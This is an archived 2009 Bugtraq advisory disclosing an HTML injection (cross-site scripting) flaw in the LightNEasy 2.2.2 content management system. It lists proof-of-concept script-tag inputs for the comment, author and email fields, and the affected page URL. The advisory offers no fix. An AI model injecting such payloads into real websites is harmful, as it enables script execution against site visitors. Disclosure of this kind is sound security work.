lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 3 Jun 2009 15:51:24 -0600
From: security@...ern0t.net
To: bugtraq@...urityfocus.com
Subject: [InterN0T] LightNEasy 2.2.2 - HTML Injection Vulnerability

LightNEasy - HTML Injection Vulnerability

Version Affected: 2.2.2 (15th January 2009) (newest)

Info: LightNEasy, a simple and light Content Management System and Website Builder

Credits: InterN0T

External Links:
http://lightneasy.org/


-:: The Advisory ::-

Vulnerable Input Fields:
1. Comment <script>alert(0)</script>
2. Author <script>alert(0)</script>
3. Email "><script>alert(0)</script>

Affected URL's:
http://www.website.tld/lightneasy/LightNEasy.php?page=news&id=1&showcomments=1

-:: Solution ::-
I didn't bother to find one, sorry.

Reference:
http://forum.intern0t.net/intern0t-advisories/1081-intern0t-lightneasy-2-2-2-html-injection-vulnerability.html

Disclosure Information:
- Vulnerability found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.


All of the best,
MaXe

Powered by blists - more mailing lists